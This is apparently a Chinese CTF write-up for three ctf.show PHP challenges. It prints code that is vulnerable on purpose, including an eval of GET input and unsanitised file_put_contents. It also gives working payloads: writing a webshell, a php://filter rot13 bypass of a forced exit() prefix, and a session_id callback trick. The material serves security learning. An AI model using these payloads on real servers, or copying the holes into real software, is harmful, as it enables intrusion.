热身
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-01-16 15:42:02
# @Last Modified by: h1xa
# @Last Modified time: 2022-01-24 22:14:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
eval($_GET['f']);用phpinfo看了一下没有禁用函数貌似
http://27abbe71-e00a-4609-9b50-b878fcfcc086.challenge.ctf.show/?f=file_put_contents('1.php','FILE);?>');
写入一句话木马发现
类容被函数append重定向到了index.php
去phpinfo找append配置
用蚁剑连接shell访问
web1
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-01-16 15:42:02
# @Last Modified by: h1xa
# @Last Modified time: 2022-01-24 22:14:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
error_reporting(0);
$content = $_GET[content];
file_put_contents($content,'<?php exit();'.$content);
写入函数:file_put_contents('filename','data')
这里被data的内容貌似被写死了
绕过方法:-------已搬运------php://filter 绕过死亡file_put_content() base64 的编码小trick_Zero_Adam的博客-CSDN博客
payload:http://84d5fea7-28f5-4c24-bd84-b36447a6e2df.challenge.ctf.show/?content=php://filter/write=string.rot13||/resource=shell.php
web2
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-01-16 15:42:02
# @Last Modified by: h1xa
# @Last Modified time: 2022-01-24 22:14:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
session_start();
error_reporting(0);
include "flag.php";
if(count($_POST)===1){
extract($_POST);
if (call_user_func($$$$$${key($_POST)})==="HappyNewYear"){
echo $flag;
}
}
?>
if (call_user_func($$$$$${key($_POST)})==="HappyNewYear")
这里是关键回调函数,接收POST数据,要写一个可用的函数满足内容等于HappyNewYear
思路一开始是看看有没有能接收useragent的函数,抓包修改useragent内容为'HappyNewYear' 可惜没找到
然后找到一个接收session_id的函数
payload:POST session_id=session_id
抓包:phpsessionid=HappyNewYear